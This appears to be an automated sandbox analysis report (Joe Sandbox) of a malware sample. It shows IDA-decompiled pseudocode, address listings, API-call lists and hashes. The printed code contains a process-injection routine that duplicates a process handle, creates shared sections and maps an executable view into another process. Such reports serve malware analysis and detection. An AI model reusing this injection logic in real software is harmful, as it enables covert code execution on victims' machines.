				L004011B1(_t56, _t85, _t95, 0x3956845, _t105, _t119);
				_t84 =  *((intOrPtr*)(_t114 + 8));
				 *((intOrPtr*)(_t114 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t114 - 0x34)) =  *((intOrPtr*)(_t114 - 0x34)) + 1;
				}
				while(1) {
					_t59 =  *((intOrPtr*)(_t84 + 0x48))();
					if(_t59 != 0) {
						break;
					}
					 *((intOrPtr*)(_t84 + 0x1c))(0x3e8);
					asm("invalid");
				}
				 *((intOrPtr*)(_t114 - 0x5c)) = _t59;
				_t106 = _t114 - 0x60;
				 *_t106 = 0;
				 *((intOrPtr*)(_t84 + 0x4c))(_t59, _t106);
				_t62 =  *_t106;
				if(_t62 == 0) {
					L44:
					__ecx =  *__esp;
					__esp = __esp + 4;
					__edx =  *__esp;
					__esp = __esp + 4;
					__eax = L004011B1(__eax, __ecx, __edx, __edi, __esi, __eflags);
					__edi = 0x84;
					__esi = 0x395;
					__esp = __ebp;
					__ebp = 0x156b;
					return __eax;
				} else {
					_t86 = _t114 - 0x30;
					 *_t86 = _t62;
					 *((intOrPtr*)(_t86 + 4)) = 0;
					_t107 = _t114 - 0x28;
					 *((intOrPtr*)(_t84 + 0x10))(_t107, 0x18);
					 *_t107 = 0x18;
					_push(_t114 - 0x30);
					_push(_t107);
					_push(0x40);
					_push(_t114 - 0x10);
					if( *((intOrPtr*)(_t84 + 0x70))() != 0 || NtDuplicateObject( *(_t114 - 0x10), 0xffffffff, 0xffffffff, _t114 - 0xc, 0, 0, 2) != 0) {
						goto L44;
					} else {
						 *((intOrPtr*)(_t114 - 8)) = 0;
						_t68 = _t114 - 0x50;
						 *((intOrPtr*)(_t68 + 4)) = 0;
						 *_t68 = 0x5000;
						_t108 = _t114 - 0x54;
						if(NtCreateSection(_t108, 6, 0, _t68, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t114 - 0x50);
							_t78 = _t114 - 0x44;
							 *_t78 = 0;
							if(NtMapViewOfSection( *_t108, 0xffffffff, _t78, 0, 0, 0, _t114 - 0x38, 1, 0, 4) == 0) {
								_t80 = _t114 - 0x3c;
								 *_t80 = 0;
								if(NtMapViewOfSection( *_t108,  *(_t114 - 0xc), _t80, 0, 0, 0, _t114 - 0x38, 1, 0, 4) == 0) {
									_t113 =  *(_t114 - 0x44);
									 *((intOrPtr*)(_t84 + 0x20))(0, _t113, 0x104);
									 *((intOrPtr*)(_t113 + 0x208)) =  *((intOrPtr*)(_t114 + 0x14));
									 *((intOrPtr*)(_t114 - 8)) =  *((intOrPtr*)(_t114 - 8)) + 1;
								}
							}
						}
						_t70 = _t114 - 0x50;
						 *((intOrPtr*)(_t70 + 4)) = 0;
						 *_t70 =  *((intOrPtr*)(_t114 + 0x10)) + 0x10000;
						_t109 = _t114 - 0x58;
						if(NtCreateSection(_t109, 0xe, 0, _t70, 0x40, 0x8000000, 0) != 0 ||  *((intOrPtr*)(_t114 - 8)) == 0) {
							goto L44;
						} else {
							 *_t46 =  *(_t114 - 0x50);
							_t72 = _t114 - 0x48;
							 *_t72 = 0;
							if(NtMapViewOfSection( *_t109, 0xffffffff, _t72, 0, 0, 0, _t114 - 0x38, 1, 0, 4) != 0) {
								goto L44;
							} else {
								_t74 = _t114 - 0x40;
								 *_t74 = 0;
								_t133 = NtMapViewOfSection( *_t109,  *(_t114 - 0xc), _t74, 0, 0, 0, _t114 - 0x38, 1, 0, 0x20);
								if(_t133 != 0) {
									goto L44;
								} else {
									L20();
									if(_t133 == 0 && _t133 != 0) {
										asm("rol ah, 1");
									}
									_push(0x2dfb);
									_t98 = 0x2260;
									_push(_t98);
									asm("lodsb");
									asm("loop 0xffffffc6");
								}
							}
						}
					}
				}
			}

0x0040153d
0x0040153e
0x00401541
0x00401546
0x0040155e
0x00401566
0x0040156b
0x00401570
0x00401579
0x0040157b
0x0040157b
0x0040157e
0x0040157e
0x00401583
0x00000000
0x00000000
0x004018ae
0x004018b5
0x004018b5
0x00401589
0x0040158c
0x0040158f
0x00401593
0x00401596
0x0040159a
0x004018a7
0x004018d5
0x004018d8
0x004018ee
0x004018f1
0x004018fb
0x00401900
0x00401901
0x00401903
0x00401903
0x00401904
0x004015a0
0x004015a0
0x004015a3
0x004015a5
0x004015a8
0x004015ae
0x004015b1
0x004015bf
0x004015c0
0x004015c1
0x004015c3
0x004015c9
0x00000000
0x004015ec
0x004015ec
0x004015ef
0x004015f2
0x004015f5
0x004015fb
0x00401610
0x00401615
0x00401618
0x0040161b
0x00401633
0x00401635
0x00401638
0x00401651
0x00401653
0x0040165d
0x00401663
0x00401669
0x00401669
0x00401651
0x00401633
0x0040166c
0x00401678
0x0040167b
0x0040167d
0x00401692
0x00000000
0x004016a2
0x004016a5
0x004016a8
0x004016ab
0x004016c3
0x00000000
0x004016c9
0x004016c9
0x004016cc
0x004016e3
0x004016e5
0x00000000
0x004016eb
0x004016eb
0x004016f0
0x004016f4
0x004016f4
0x00401721
0x00401740
0x00401750
0x00401775
0x00401782
0x0040178b
0x004016e5
0x004016c3
0x00401692
0x004015c9

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040162E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040164C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040168D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016BE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E0

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f481718cf31c508339df55ee9379bafa783de68648224969f426c7f1bc2632ef
Instruction ID: 9e10a8d9bdc153f0d481a040d67758d949b653d2b18fc03426a2673dfdfce93a
Opcode Fuzzy Hash: f481718cf31c508339df55ee9379bafa783de68648224969f426c7f1bc2632ef
Instruction Fuzzy Hash: 9E513AB5900245BFEB209F91CC48FEFBBB8FF85B10F14412AF911AA2A5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401561(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t56;
				intOrPtr _t59;
				intOrPtr _t62;
				struct _GUID _t68;
				struct _GUID _t70;
				PVOID* _t72;
				PVOID* _t74;
				PVOID* _t78;
				PVOID* _t80;
				intOrPtr _t85;
				intOrPtr* _t87;
				void* _t97;
				void* _t100;
				intOrPtr* _t108;
				intOrPtr* _t109;
				HANDLE* _t110;
				HANDLE* _t111;
				void* _t115;
				void* _t116;
				void* _t120;
				long _t134;

				_t120 = __ebx - __edx;
				_t97 = 0x84;
				L004011B1(_t56, __ecx, _t97, __edi, __esi, _t120);
				_t85 =  *((intOrPtr*)(_t116 + 8));
				 *((intOrPtr*)(_t116 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t116 - 0x34)) =  *((intOrPtr*)(_t116 - 0x34)) + 1;
				}
				while(1) {
					_t59 =  *((intOrPtr*)(_t85 + 0x48))();
					if(_t59 != 0) {
						break;
					}
					 *((intOrPtr*)(_t85 + 0x1c))(0x3e8);
					asm("invalid");
				}
				 *((intOrPtr*)(_t116 - 0x5c)) = _t59;
				_t108 = _t116 - 0x60;
				 *_t108 = 0;
				 *((intOrPtr*)(_t85 + 0x4c))(_t59, _t108);
				_t62 =  *_t108;
				if(_t62 == 0) {
					L42:
					__ecx =  *__esp;
					__esp = __esp + 4;
					__edx =  *__esp;
					__esp = __esp + 4;
					__eax = L004011B1(__eax, __ecx, __edx, __edi, __esi, __eflags);
					__edi = 0x84;
					__esi = 0x395;
					__ebx = 0x156b;
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				} else {
					_t87 = _t116 - 0x30;
					 *_t87 = _t62;
					 *((intOrPtr*)(_t87 + 4)) = 0;
					_t109 = _t116 - 0x28;
					 *((intOrPtr*)(_t85 + 0x10))(_t109, 0x18);
					 *_t109 = 0x18;
					_push(_t116 - 0x30);
					_push(_t109);
					_push(0x40);
					_push(_t116 - 0x10);
					if( *((intOrPtr*)(_t85 + 0x70))() != 0 || NtDuplicateObject( *(_t116 - 0x10), 0xffffffff, 0xffffffff, _t116 - 0xc, 0, 0, 2) != 0) {
						goto L42;
					} else {
						 *((intOrPtr*)(_t116 - 8)) = 0;
						_t68 = _t116 - 0x50;
						 *((intOrPtr*)(_t68 + 4)) = 0;
						 *_t68 = 0x5000;
						_t110 = _t116 - 0x54;
						if(NtCreateSection(_t110, 6, 0, _t68, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t116 - 0x50);
							_t78 = _t116 - 0x44;
							 *_t78 = 0;
							if(NtMapViewOfSection( *_t110, 0xffffffff, _t78, 0, 0, 0, _t116 - 0x38, 1, 0, 4) == 0) {
								_t80 = _t116 - 0x3c;
								 *_t80 = 0;
								if(NtMapViewOfSection( *_t110,  *(_t116 - 0xc), _t80, 0, 0, 0, _t116 - 0x38, 1, 0, 4) == 0) {
									_t115 =  *(_t116 - 0x44);
									 *((intOrPtr*)(_t85 + 0x20))(0, _t115, 0x104);
									 *((intOrPtr*)(_t115 + 0x208)) =  *((intOrPtr*)(_t116 + 0x14));
									 *((intOrPtr*)(_t116 - 8)) =  *((intOrPtr*)(_t116 - 8)) + 1;
								}
							}
						}
						_t70 = _t116 - 0x50;
						 *((intOrPtr*)(_t70 + 4)) = 0;
						 *_t70 =  *((intOrPtr*)(_t116 + 0x10)) + 0x10000;
						_t111 = _t116 - 0x58;
						if(NtCreateSection(_t111, 0xe, 0, _t70, 0x40, 0x8000000, 0) != 0 ||  *((intOrPtr*)(_t116 - 8)) == 0) {
							goto L42;
						} else {
							 *_t46 =  *(_t116 - 0x50);
							_t72 = _t116 - 0x48;
							 *_t72 = 0;
							if(NtMapViewOfSection( *_t111, 0xffffffff, _t72, 0, 0, 0, _t116 - 0x38, 1, 0, 4) != 0) {
								goto L42;
							} else {
								_t74 = _t116 - 0x40;
								 *_t74 = 0;
								_t134 = NtMapViewOfSection( *_t111,  *(_t116 - 0xc), _t74, 0, 0, 0, _t116 - 0x38, 1, 0, 0x20);
								if(_t134 != 0) {
									goto L42;
								} else {
									L18();
									if(_t134 == 0 && _t134 != 0) {
										asm("rol ah, 1");
									}
									_push(0x2dfb);
									_t100 = 0x2260;
									_push(_t100);
									asm("lodsb");
									asm("loop 0xffffffc6");
								}
							}
						}
					}
				}
			}

0x00401561
0x0040155e
0x00401566
0x0040156b
0x00401570
0x00401579
0x0040157b
0x0040157b
0x0040157e
0x0040157e
0x00401583
0x00000000
0x00000000
0x004018ae
0x004018b5
0x004018b5
0x00401589
0x0040158c
0x0040158f
0x00401593
0x00401596
0x0040159a
0x004018a7
0x004018d5
0x004018d8
0x004018ee
0x004018f1
0x004018fb
0x00401900
0x00401901
0x00401902
0x00401903
0x00401903
0x00401904
0x004015a0
0x004015a0
0x004015a3
0x004015a5
0x004015a8
0x004015ae
0x004015b1
0x004015bf
0x004015c0
0x004015c1
0x004015c3
0x004015c9
0x00000000
0x004015ec
0x004015ec
0x004015ef
0x004015f2
0x004015f5
0x004015fb
0x00401610
0x00401615
0x00401618
0x0040161b
0x00401633
0x00401635
0x00401638
0x00401651
0x00401653
0x0040165d
0x00401663
0x00401669
0x00401669
0x00401651
0x00401633
0x0040166c
0x00401678
0x0040167b
0x0040167d
0x00401692
0x00000000
0x004016a2
0x004016a5
0x004016a8
0x004016ab
0x004016c3
0x00000000
0x004016c9
0x004016c9
0x004016cc
0x004016e3
0x004016e5
0x00000000
0x004016eb
0x004016eb
0x004016f0
0x004016f4
0x004016f4
0x00401721
0x00401740
0x00401750
0x00401775
0x00401782
0x0040178b
0x004016e5
0x004016c3
0x00401692
0x004015c9

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040162E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040164C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040168D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016BE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E0

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 284c24981728eb43a908f6e78bed83665affb0632088360013b60fdb08dcd2f1
Instruction ID: 192e68dc5121cdccefa07858f8f7bf735b97d13d3064c8d8f16f63a82c8189de
Opcode Fuzzy Hash: 284c24981728eb43a908f6e78bed83665affb0632088360013b60fdb08dcd2f1
Instruction Fuzzy Hash: 2B512AB5900205BFEF209F91CC48FEFBBB8EF85B00F14411AF911AA2A5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 99
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000C7,00000077), ref: 00401962

Part of subcall function 0040151E: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
Part of subcall function 0040151E: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f342fe0f718c2af3401fca66cb4f5fb615f04a27f06085bab238dd04f9a95fec
Instruction ID: 5628bef64af06ef99b22fed55ca8b56550464987267dddb898052c1ad66e17e4
Opcode Fuzzy Hash: f342fe0f718c2af3401fca66cb4f5fb615f04a27f06085bab238dd04f9a95fec
Instruction Fuzzy Hash: FA21F2B2608201EBE700BB949C91E693764AB01304F348237E647791F1D63D9A17E75B

Uniqueness

Uniqueness Score: -1.00%

Function 00401907 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00401907(void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16) {
				void* _v8;
				intOrPtr _t8;
				intOrPtr _t18;
				intOrPtr* _t24;
				intOrPtr* _t25;

				_push(0x195a);
				_t8 =  *_t24;
				_t25 = _t24 + 4;
				_push(0x77);
				_t18 =  *_t25;
			}

0x00401917
0x0040191c
0x0040191f
0x0040192f
0x00401931

APIs

Sleep.KERNELBASE(00001388,000000C7,00000077), ref: 00401962

Part of subcall function 0040151E: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
Part of subcall function 0040151E: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 7d151b417214f06ed0f3f60361a9c36a4bd3aae40708b17d4d549da9caabf738
Instruction ID: f0efe78c6ed54c72afa909b582c9e4e8e562211b1e14a50830003293bb337130
Opcode Fuzzy Hash: 7d151b417214f06ed0f3f60361a9c36a4bd3aae40708b17d4d549da9caabf738
Instruction Fuzzy Hash: EB119EF160C105E7E7006A549DB2E7A36689B01754F204237FA47391F1C53D9913E79B

Uniqueness

Uniqueness Score: -1.00%

Function 00401939 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000C7,00000077), ref: 00401962

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3f680a8eaffc5109b0e6cbdd5a047c0444535e1cbb6ed97ef0ec2dcca79433cb
Instruction ID: 6ac2999b2b944763dd4c084e963a8ef8c06266544b2b654e43f22b74ad209c30
Opcode Fuzzy Hash: 3f680a8eaffc5109b0e6cbdd5a047c0444535e1cbb6ed97ef0ec2dcca79433cb
Instruction Fuzzy Hash: 1B11CEB2608244EBEB01AF909DA1E693B24AF05300F254277FA477A1F2D13C8517EB1B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004032F9 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032F9(void* __eax, void* __ebx, signed int __ecx) {
				signed int _t12;
				signed int _t13;
				intOrPtr _t14;
				void* _t18;
				void* _t19;
				intOrPtr _t22;

				 *((intOrPtr*)(__ecx - 0x15)) =  *((intOrPtr*)(__ecx - 0x15)) + __ebx;
				_t12 = __eax + 0xf4ebb402;
				_t13 = _t12 * __ecx;
				_t14 = _t13 + __ebx;
				_t22 = _t14;
				if(_t22 != 0 && _t22 == 0) {
					 *((char*)(_t14 + _t18 - 0x76fb137d)) =  *((char*)(_t14 + _t18 - 0x76fb137d)) - 4;
				}
				 *((intOrPtr*)(_t19 - 4)) = _t14;
				return _t14;
			}

0x004032f9
0x004032fc
0x00403305
0x0040330e
0x0040330e
0x00403310
0x00403314
0x00403314
0x0040331a
0x00000000

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cb5c20c4d6e95a43d2d194e085c0b1134fd0b302f063c3ed727a6d7b0bb78db
Instruction ID: dd1308b54f84d3f03449ce10ab33926f816e595eb4e5b7e81ed1d32e7c7a2196
Opcode Fuzzy Hash: 9cb5c20c4d6e95a43d2d194e085c0b1134fd0b302f063c3ed727a6d7b0bb78db
Instruction Fuzzy Hash: FB41121284D3C56FD7236B704CAAADABFA49A13314B0D42EBC4E1CB1E3D62D4A07C346

Uniqueness

Uniqueness Score: -1.00%

Function 004026B6 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e7447f8a8602b5453d74e6c40fe5b1129ca941c0710db4c605de7e4cd50ae51
Instruction ID: 02db8267d34cf2039cc1ef9a7f3e403c72e58e9f84a4c83f42169e357affa1ad
Opcode Fuzzy Hash: 5e7447f8a8602b5453d74e6c40fe5b1129ca941c0710db4c605de7e4cd50ae51
Instruction Fuzzy Hash: F4214939D18781BFD723AE75C4DD2423B71BF0E25871807BBC49097192D7629482C383

Uniqueness

Uniqueness Score: -1.00%

Function 00402397 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef28f0254dc1b3d0065fa8cb7837b37ebebd3d5ce4404f3da6ec0bdc02cbf4fc
Instruction ID: 5a041c63283d67b3d20db15017d503f5565bf031e000c7b0081705a4e951828b
Opcode Fuzzy Hash: ef28f0254dc1b3d0065fa8cb7837b37ebebd3d5ce4404f3da6ec0bdc02cbf4fc
Instruction Fuzzy Hash: 08012B2154CE01A6DB0225308EDE9EEF76DE791704F740623ED829A4C7C2BC185B57D7

Uniqueness

Uniqueness Score: -1.00%

Function 0040233F Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538e5c79f366f9ca73ff8f3e9cf85a22c506a103fe00fa2cb855e8896752ee32
Instruction ID: ab06418fa702e37c66ae23efe9fa649b49615372587302324d3ebdf758a1529a
Opcode Fuzzy Hash: 538e5c79f366f9ca73ff8f3e9cf85a22c506a103fe00fa2cb855e8896752ee32
Instruction Fuzzy Hash: 5E01892110CD01A6CB0625309EEE9DEF768E691310B340323ED829A8C7C27D185B57C7

Uniqueness

Uniqueness Score: -1.00%

Function 004022D8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1e44c7ae8c4c3238fc2f2a23605d271e2c6d60e08faf27799be07161f825ea
Instruction ID: e68d27142e9bd145ba44595f9ac4456ec12fb893559288fef379bb382afff38b
Opcode Fuzzy Hash: 3d1e44c7ae8c4c3238fc2f2a23605d271e2c6d60e08faf27799be07161f825ea
Instruction Fuzzy Hash: 7801496154CD11A6CB0615309AEEAEEF769E691314B340223ED83AA8C7C27D185B57C7

Uniqueness

Uniqueness Score: -1.00%

Function 004023B5 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a676b5285b786a4027361f245f0c9d0b58976a266388707c2ce1159c7ec3ca01
Instruction ID: 2a9aab3188a512e64a326dbf5142d63b1749345dcc0bedbf345405365d14ae30
Opcode Fuzzy Hash: a676b5285b786a4027361f245f0c9d0b58976a266388707c2ce1159c7ec3ca01
Instruction Fuzzy Hash: 1601F92154CE019ADB0226308DDE5DEF799E791704B740623ED82DE8C7C27C185B5BC7

Uniqueness

Uniqueness Score: -1.00%

Function 004023BD Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65f46524212f35cda11c1efbce405e245cc280c60f0d2cb9521c8ed0afbcb217
Instruction ID: 63323523a386c8b6a86eda4da433bacfa3e9aa6dd255d6f4894e11f8dda55945
Opcode Fuzzy Hash: 65f46524212f35cda11c1efbce405e245cc280c60f0d2cb9521c8ed0afbcb217
Instruction Fuzzy Hash: 51019E2114CD015ACB022630CDEB9DEF768E795600B740712EC82CE8C7C238185B4BC3

Uniqueness

Uniqueness Score: -1.00%

Function 004023E1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebdac5e76a198675d7eccdef5c9a85707c71781b653fb53724df8daa5dbe40e8
Instruction ID: 74a989400cf34e9616f35191d951123844ef2d97df1cafd115e03a4ce76bda18
Opcode Fuzzy Hash: ebdac5e76a198675d7eccdef5c9a85707c71781b653fb53724df8daa5dbe40e8
Instruction Fuzzy Hash: 23F02456198E522ACB16263088EB4CEFBADE5C56247B80740FD81CE80BC224185F8AD3

Uniqueness

Uniqueness Score: -1.00%

Function 004022FD Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
